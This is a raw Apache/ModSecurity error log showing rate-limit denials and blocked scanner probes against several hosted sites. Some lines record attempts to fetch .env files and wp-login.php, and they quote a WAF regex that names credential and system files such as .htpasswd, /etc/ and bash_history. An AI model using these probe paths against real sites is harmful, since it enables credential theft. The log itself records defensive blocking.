[Tue May 26 19:54:47.324503 2026] [security2:error] [pid 93868:tid 94307] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLUqK9k_ZUB2Vp25LRQAAAcA"]
[Tue May 26 19:54:47.325413 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLWDRMqfxdEDkoszTRQAAAGs"]
[Tue May 26 19:54:47.325545 2026] [security2:error] [pid 86490:tid 86632] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LFCQAAAJE"]
[Tue May 26 19:54:47.346374 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLUqK9k_ZUB2Vp25LUQAAAak"]
[Tue May 26 19:54:47.352998 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LFGgAAALY"]
[Tue May 26 19:54:47.356031 2026] [security2:error] [pid 86490:tid 86656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LFDgAAAKk"]
[Tue May 26 19:54:47.360862 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLmDRMqfxdEDkoszTUwAAAGQ"]
[Tue May 26 19:54:47.394775 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLkqK9k_ZUB2Vp25LaAAAAZ8"]
[Tue May 26 19:54:47.410160 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LFIAAAAN0"]
[Tue May 26 19:54:47.412142 2026] [security2:error] [pid 86490:tid 86623] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LFEgAAAIg"]
[Tue May 26 19:54:47.414445 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLUqK9k_ZUB2Vp25LUAAAAfw"]
[Tue May 26 19:54:47.425440 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLkqK9k_ZUB2Vp25LcwAAAck"]
[Tue May 26 19:54:47.449378 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLkqK9k_ZUB2Vp25LbQAAAeI"]
[Tue May 26 19:54:47.452917 2026] [security2:error] [pid 86490:tid 86636] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFSgAAAJU"]
[Tue May 26 19:54:47.461197 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLkqK9k_ZUB2Vp25LagAAAfU"]
[Tue May 26 19:54:47.463825 2026] [security2:error] [pid 86490:tid 86704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFRgAAANk"]
[Tue May 26 19:54:47.734685 2026] [security2:error] [pid 86490:tid 86722] [client 104.28.155.29:10281] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "athelstan.org.in"] [uri "/wp-login.php"] [unique_id "ahWtL1ZMwN0DpLVWo6LFmgAAAOs"]
[Tue May 26 19:54:47.874077 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtL1ZMwN0DpLVWo6LF1wAAAOc
[Tue May 26 19:54:47.877772 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL1ZMwN0DpLVWo6LF3AAAAPQ
[Tue May 26 19:54:47.879614 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtL1ZMwN0DpLVWo6LF3QAAAMo
[Tue May 26 19:54:47.879846 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL1ZMwN0DpLVWo6LF3gAAAIw
[Tue May 26 19:54:47.884890 2026] [qos:error] [pid 93868:tid 94363] [client 45.148.10.120:60006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL0qK9k_ZUB2Vp25LnAAAAfg
[Tue May 26 19:54:47.885204 2026] [qos:error] [pid 86490:tid 86634] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL1ZMwN0DpLVWo6LF3wAAAJM
[Tue May 26 19:54:47.886197 2026] [qos:error] [pid 93868:tid 94311] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtL0qK9k_ZUB2Vp25LngAAAcQ
[Tue May 26 19:54:47.886522 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:60008] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL1ZMwN0DpLVWo6LF4AAAAJU
[Tue May 26 19:54:47.887299 2026] [qos:error] [pid 86490:tid 86734] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtL1ZMwN0DpLVWo6LF4QAAAPc
[Tue May 26 19:54:47.900817 2026] [security2:error] [pid 93576:tid 93796] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mssql/.env"] [unique_id "ahWtL2DRMqfxdEDkoszTfgAAAFQ"]
[Tue May 26 19:54:48.029758 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF6gAAAPM
[Tue May 26 19:54:48.029762 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF6QAAAMI
[Tue May 26 19:54:48.033855 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF6wAAAIU
[Tue May 26 19:54:48.034111 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:60006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMEqK9k_ZUB2Vp25LoQAAAgQ
[Tue May 26 19:54:48.083780 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:60008] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF7AAAALY
[Tue May 26 19:54:48.084750 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF7QAAAPw
[Tue May 26 19:54:48.087650 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF7gAAAIo
[Tue May 26 19:54:48.182165 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF8AAAAMo
[Tue May 26 19:54:48.182170 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF7wAAAIw
[Tue May 26 19:54:48.183365 2026] [qos:error] [pid 93868:tid 94259] [client 45.148.10.120:60006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMEqK9k_ZUB2Vp25LogAAAZA
[Tue May 26 19:54:48.185101 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF8QAAAN0
[Tue May 26 19:54:48.193407 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:60074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF8gAAAPk
[Tue May 26 19:54:48.234760 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF9AAAAKk
[Tue May 26 19:54:48.236687 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:60008] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF9QAAAKo
[Tue May 26 19:54:48.237751 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LF9wAAAJU
[Tue May 26 19:54:48.277039 2026] [security2:error] [pid 93868:tid 94372] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLUqK9k_ZUB2Vp25LUgAAAgE"]
[Tue May 26 19:54:48.277129 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLmDRMqfxdEDkoszTVgAAAHc"]
[Tue May 26 19:54:48.283299 2026] [security2:error] [pid 93868:tid 94369] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLkqK9k_ZUB2Vp25LdAAAAf4"]
[Tue May 26 19:54:48.283582 2026] [security2:error] [pid 86490:tid 86668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFSwAAALU"]
[Tue May 26 19:54:48.289429 2026] [security2:error] [pid 86490:tid 86719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFWAAAAOg"]
[Tue May 26 19:54:48.290276 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLmDRMqfxdEDkoszTWgAAACQ"]
[Tue May 26 19:54:48.290915 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLmDRMqfxdEDkoszTXgAAABE"]
[Tue May 26 19:54:48.300279 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLmDRMqfxdEDkoszTVQAAAB0"]
[Tue May 26 19:54:48.301974 2026] [security2:error] [pid 86490:tid 86648] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFYQAAAKE"]
[Tue May 26 19:54:48.302799 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLmDRMqfxdEDkoszTWQAAAG8"]
[Tue May 26 19:54:48.310805 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFXgAAAKw"]
[Tue May 26 19:54:48.313087 2026] [security2:error] [pid 86490:tid 86692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFYAAAAM0"]
[Tue May 26 19:54:48.322948 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFaQAAAPU"]
[Tue May 26 19:54:48.334435 2026] [security2:error] [pid 93868:tid 94352] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLkqK9k_ZUB2Vp25LcgAAAe0"]
[Tue May 26 19:54:48.349216 2026] [security2:error] [pid 86490:tid 86630] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFaAAAAI8"]
[Tue May 26 19:54:48.350218 2026] [security2:error] [pid 86490:tid 86649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFWwAAAKI"]
[Tue May 26 19:54:48.350307 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LggAAAcw"]
[Tue May 26 19:54:48.356688 2026] [security2:error] [pid 93868:tid 94265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLkqK9k_ZUB2Vp25LdwAAAZY"]
[Tue May 26 19:54:48.366067 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLkqK9k_ZUB2Vp25LegAAAcc"]
[Tue May 26 19:54:48.372004 2026] [security2:error] [pid 86490:tid 86705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFfgAAANo"]
[Tue May 26 19:54:48.380450 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL1ZMwN0DpLVWo6LFpAAAAQQ"]
[Tue May 26 19:54:48.381807 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LiAAAAf0"]
[Tue May 26 19:54:48.381994 2026] [security2:error] [pid 93868:tid 94324] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LhAAAAdE"]
[Tue May 26 19:54:48.387830 2026] [security2:error] [pid 86490:tid 86697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFegAAANI"]
[Tue May 26 19:54:48.396107 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LhgAAAfE"]
[Tue May 26 19:54:48.409702 2026] [security2:error] [pid 93576:tid 93768] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/html/.env"] [unique_id "ahWtMGDRMqfxdEDkoszThgAAADg"]
[Tue May 26 19:54:48.409905 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLkqK9k_ZUB2Vp25LdQAAAco"]
[Tue May 26 19:54:48.413979 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LhQAAAZU"]
[Tue May 26 19:54:48.418351 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL2DRMqfxdEDkoszTcgAAAAw"]
[Tue May 26 19:54:48.421433 2026] [security2:error] [pid 86490:tid 86720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFfwAAAOk"]
[Tue May 26 19:54:48.437907 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL2DRMqfxdEDkoszTdAAAAAk"]
[Tue May 26 19:54:48.439488 2026] [security2:error] [pid 93868:tid 94310] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LiQAAAcM"]
[Tue May 26 19:54:48.448549 2026] [security2:error] [pid 86490:tid 86743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL1ZMwN0DpLVWo6LFugAAAQA"]
[Tue May 26 19:54:48.458325 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LkAAAAZc"]
[Tue May 26 19:54:48.577124 2026] [security2:error] [pid 93576:tid 93733] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/routes/console/.env"] [unique_id "ahWtMGDRMqfxdEDkoszTjgAAABU"]
[Tue May 26 19:54:48.623504 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGQQAAAJw
